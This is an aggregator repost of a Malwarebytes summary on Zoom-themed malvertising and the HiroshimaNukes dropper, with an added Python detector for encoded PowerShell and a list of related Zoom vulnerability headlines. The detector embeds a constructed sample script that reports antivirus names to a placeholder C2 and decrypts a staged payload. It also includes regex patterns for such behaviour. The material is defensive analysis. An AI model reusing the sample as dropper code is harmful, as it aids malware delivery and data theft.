Malvertisers zoom in on cryptocurrencies and initial access

While Zoom is used by millions of people around the world, these campaigns are likely targeting victims who are into cryptocurrencies as well as corporate users, in order to gain access to company networks.
The threat actors are using a number of fake identities to create multiple advertiser accounts.
While we don't know how many people may have fallen for these Zoom malvertising campaigns, we can say that the number of ads and their positioning was prominent enough to generate a substantial amount of traffic.
The threat actors are using tracking templates to cloak the redirection mechanism, sending visitors either to the legitimate Zoom website or to a site of their choosing.
HiroshimaNukes is a name given by its author to a piece of malware that was new to us.
Its goal is to drop additional malware, typically a stealer followed by data exfiltration.
DLL side-loading is a technique used by threat actors to bypass detection.
While DLL side-loading is commonly used by malware authors, it is also a distinctive TTP that we don't see in every malvertising campaign.
We were able to search for previous similar attacks from the same threat actor.
The threat actors are tracking victims from their campaigns using a control panel called Hunting panel 1.40, which was new to us.
Malware payload

The malicious installer contains several files, but the malicious components reside in the PowerShell scripts.
This technique has been used by the threat actor for months already, probably because they get higher infection rates than with a traditional malware binary.
The Base64-encoded PowerShell reveals the malware's command and control server as well as a number of other commands, such as reporting telemetry about the machine and any installed security software back to the server, and, more importantly, a GPG-encrypted payload that is decoded on the fly.
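As an added illustration of the analyst-side work described above (not code from the original article or from Malwarebytes), the Python below decodes a PowerShell -EncodedCommand blob from a process-creation log line and flags the three behaviours the summary names: a download to a C2 URL, enumeration of installed security software, and GPG decryption of a staged payload. The log line, the script and the domain c2.example.invalid are constructed placeholders, not indicators from the campaign.

```python
"""Decode Base64-encoded PowerShell from a process-creation log line and
flag indicators of the behaviour described in the report. Added example:
the log line, script and domain are constructed, not campaign samples."""
import base64
import re
from typing import Optional

# Constructed decoded script standing in for what an analyst would see.
# The domain is a placeholder, not an indicator from the report.
SAMPLE_SCRIPT = (
    "$c2 = 'http://c2.example.invalid/gate.php'\n"
    "$av = Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct\n"
    "Invoke-WebRequest -Uri \"$c2?av=$($av.displayName)\" -UseBasicParsing\n"
    "& gpg.exe --batch --passphrase x --decrypt payload.gpg | Out-File stage2.exe\n"
)


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation log line (Sysmon-like, not real telemetry).
SAMPLE_LOG = (
    "CommandLine: powershell.exe -NoProfile -WindowStyle Hidden "
    "-EncodedCommand " + encode_command(SAMPLE_SCRIPT)
)

# PowerShell accepts abbreviated forms of the switch; match the common ones.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(log_line: str) -> Optional[str]:
    """Return the decoded script if the line carries an -EncodedCommand blob, else None."""
    m = ENC_RE.search(log_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Malformed Base64 or non-UTF-16 content: treat as not decodable rather than crash.
        return None


# Behaviours the report describes, expressed as detection regexes.
INDICATORS = {
    "download_cmdlet": re.compile(
        r"Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile", re.IGNORECASE
    ),
    "security_software_enum": re.compile(r"SecurityCenter2|AntiVirusProduct", re.IGNORECASE),
    "gpg_decrypt": re.compile(r"\bgpg(?:\.exe)?\b[^\n]*--decrypt", re.IGNORECASE),
}
URL_RE = re.compile(r"https?://[^\s'\"]+")


def triage(log_line: str) -> dict:
    """Decode the command line and report which indicators fired plus any literal URLs."""
    script = decode_encoded_command(log_line)
    if script is None:
        return {"encoded": False, "hits": [], "urls": []}
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    return {"encoded": True, "hits": hits, "urls": URL_RE.findall(script)}


if __name__ == "__main__":
    print(triage(SAMPLE_LOG))
```

The decoder deliberately returns None on malformed input so that a noisy log source cannot break the triage loop; in a real pipeline the decoded script, not the Base64 blob, is what should be fed to further rules and to domain blocklists.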
We surmise this is a way for the threat actor to track their malvertising and payload delivery campaigns.
The panel's background image is from the Firewatch video game.
Malvertising continues to be a privileged malware delivery vector in which threat actors are able to bypass ad verification checks, and oftentimes security solutions as well.
We are actively tracking and reporting each new malvertising campaign we come across.
As we can't always control when third parties will take action on malicious ads, our top priority is to ensure our customers remain protected by blocking new malware domains and samples.
Both our consumer and enterprise users are protected against these threats.
We would like to thank Sergei Frankoff, malware researcher and a co-founder of Open Analysis, for his help with the HiroshimaNukes dropper.


This Cyber News was published on www.malwarebytes.com. Publication date: Wed, 13 Dec 2023 17:13:04 +0000


Cyber News related to Malvertisers zoom in on cryptocurrencies and initial access

Zoom flaw enabled hijacking of accounts with access to meetings, team chat - A Zoom flaw that enabled the hijacking of service accounts with access to potentially confidential information was disclosed by bug hunters this week. The vulnerability in the Zoom Rooms feature mostly affected Zoom tenants using email addresses from ...
1 year ago Packetstormsecurity.com
CVE-2021-34423 - A buffer overflow vulnerability was discovered in Zoom Client for Meetings (for Android, iOS, Linux, macOS, and Windows) before version 5.8.4, Zoom Client for Meetings for Blackberry (for Android and iOS) before version 5.8.1, Zoom Client for ...
2 years ago
CVE-2021-34424 - A vulnerability was discovered in the Zoom Client for Meetings (for Android, iOS, Linux, macOS, and Windows) before version 5.8.4, Zoom Client for Meetings for Blackberry (for Android and iOS) before version 5.8.1, Zoom Client for Meetings for intune ...
2 years ago
Zoom Mobile & Desktop App Flaw Let Attackers Escalate Privileges - The popular video conferencing software Zoom has security issues with its desktop and mobile apps that could allow for privilege escalation. An attacker may be able to obtain elevated privileges within the application or the operating system by ...
1 year ago Cybersecuritynews.com
Zoom Launches AI Companion, Available at No Additional Cost - Zoom has pledged to provide artificial intelligence functions on its video-conferencing platform at no additional cost to paid clients. The tech firm believes that including these extra features as part of its paid platform service will provide a ...
11 months ago Cysecurity.news
Malvertisers zoom in on cryptocurrencies and initial access - While Zoom is used by millions of people around the world, these campaigns are likely targeting victims who are into cryptocurrencies as well as corporate users, in order to gain access to company networks. The threat actors are using a number of ...
1 year ago Malwarebytes.com
Zoom stomps critical privilege escalation bug, 6 other flaws The Register - Review and manage your consent Here's an overview of our use of cookies, similar technologies and how to manage them. Video conferencing giant Zoom today opened up about a fresh batch of security vulnerabilities affecting its products, including a ...
10 months ago Go.theregister.com
Weekly Vulnerability Recap 2/19/2024: News from Microsoft, Zoom, SolarWinds - While this week was a little light on vulnerability news, it's still been significant, with Microsoft's Patch Tuesday happening as well as updates for major products, like Zoom. Akira ransomware vulnerabilities have also surfaced in older Cisco ...
10 months ago Esecurityplanet.com
Ransomware Actor Uses TeamViewer to Gain Initial Access to Networks - TeamViewer is software that organizations have long used to enable remote support, collaboration, and access to endpoint devices. Like other legitimate remote access technologies, it is also something that attackers have used with relative frequency ...
11 months ago Darkreading.com
CVE-2022-28762 - Zoom Client for Meetings for macOS (Standard and for IT Admin) starting with 5.10.6 and prior to 5.12.0 contains a debugging port misconfiguration. When camera mode rendering context is enabled as part of the Zoom App Layers API by running certain ...
2 years ago
CVE-2023-22880 - Zoom for Windows clients before version 5.13.3, Zoom Rooms for Windows clients before version 5.13.5 and Zoom VDI for Windows clients before 5.13.1 contain an information disclosure vulnerability. A recent update to the Microsoft Edge WebView2 ...
1 year ago
Data thieves abuse Microsoft's 'verified publisher' status The Register - Miscreants using malicious OAuth applications abused Microsoft's "Verified publisher" status to gain access to organizations' cloud environments, then steal data and pry into to users' mailboxes, calendars, and meetings. According to researchers with ...
1 year ago Packetstormsecurity.com
CVE-2021-34418 - The login routine of the web console in the Zoom On-Premise Meeting Connector before version 4.6.239.20200613, Zoom On-Premise Meeting Connector MMR before version 4.6.239.20200613, Zoom On-Premise Recording Connector before version 3.8.42.20200905, ...
3 years ago
CVE-2021-34417 - The network proxy page on the web portal for the Zoom On-Premise Meeting Connector Controller before version 4.6.365.20210703, Zoom On-Premise Meeting Connector MMR before version 4.6.365.20210703, Zoom On-Premise Recording Connector before version ...
3 years ago
CVE-2021-34414 - The network proxy page on the web portal for the Zoom on-premise Meeting Connector Controller before version 4.6.348.20201217, Zoom on-premise Meeting Connector MMR before version 4.6.348.20201217, Zoom on-premise Recording Connector before version ...
3 years ago
CVE-2021-34416 - The network address administrative settings web portal for the Zoom on-premise Meeting Connector before version 4.6.360.20210325, Zoom on-premise Meeting Connector MMR before version 4.6.360.20210325, Zoom on-premise Recording Connector before ...
3 years ago
CVE-2022-22785 - The Zoom Client for Meetings (for Android, iOS, Linux, MacOS, and Windows) before version 5.10.0 failed to properly constrain client session cookies to Zoom domains. This issue could be used in a more sophisticated attack to send an unsuspecting ...
2 years ago
CVE-2022-22788 - The Zoom Opener installer is downloaded by a user from the Launch meeting page, when attempting to join a meeting without having the Zoom Meeting Client installed. The Zoom Opener installer for Zoom Client for Meetings before version 5.10.3 and Zoom ...
2 years ago
Best Platform To Catch Up on Crypto News? - That is why crypto publications such as InsideBitcoins.com are getting a lot of traction. These guides give a complete analysis of new and old cryptocurrencies through multiple perspectives. Crypto price predictions are where InsideBitcoins.com's ...
1 year ago Hackread.com
CVE-2023-34120 - Improper privilege management in Zoom for Windows, Zoom Rooms for Windows, and Zoom VDI for Windows clients before 5.14.0 may allow an authenticated user to potentially enable an escalation of privilege via local access. Users may potentially ...
1 year ago
Zoom's Bug-Scoring System Prioritizes Riskiest Vulns for Cyber Teams - Videoconferencing company Zoom has rolled out a new vulnerability scoring system that promises to help cybersecurity teams prioritize resources against the most dangerous threats. Still in its 1.0 version, the Vulnerability Impact Scoring System is ...
1 year ago Darkreading.com
CVE-2021-30480 - Zoom Chat through 2021-04-09 on Windows and macOS allows certain remote authenticated attackers to execute arbitrary code without user interaction. An attacker must be within the same organization, or an external party who has been accepted as a ...
3 years ago
CVE-2022-22782 - The Zoom Client for Meetings for Windows prior to version 5.9.7, Zoom Rooms for Conference Room for Windows prior to version 5.10.0, Zoom Plugins for Microsoft Outlook for Windows prior to version 5.10.3, and Zoom VDI Windows Meeting Clients prior to ...
1 year ago
Buzzing on Christmas Eve: Trigona Ransomware in 3 Hours - In late December 2022, we observed threat actors exploiting a publicly exposed Remote Desktop Protocol host, leading to data exfiltration and the deployment of Trigona ransomware. On Christmas Eve, within just three hours of gaining initial access, ...
10 months ago Thedfirreport.com
Microsoft Implements Disablement of Widely Exploited MSIX App Installer Protocol Due to Malware Attacks - On Thursday, Microsoft announced the reactivation of the ms-appinstaller protocol handler, reverting it to its default state due to widespread exploitation by various threat actors for malware dissemination. The Microsoft Threat Intelligence team ...
11 months ago Cysecurity.news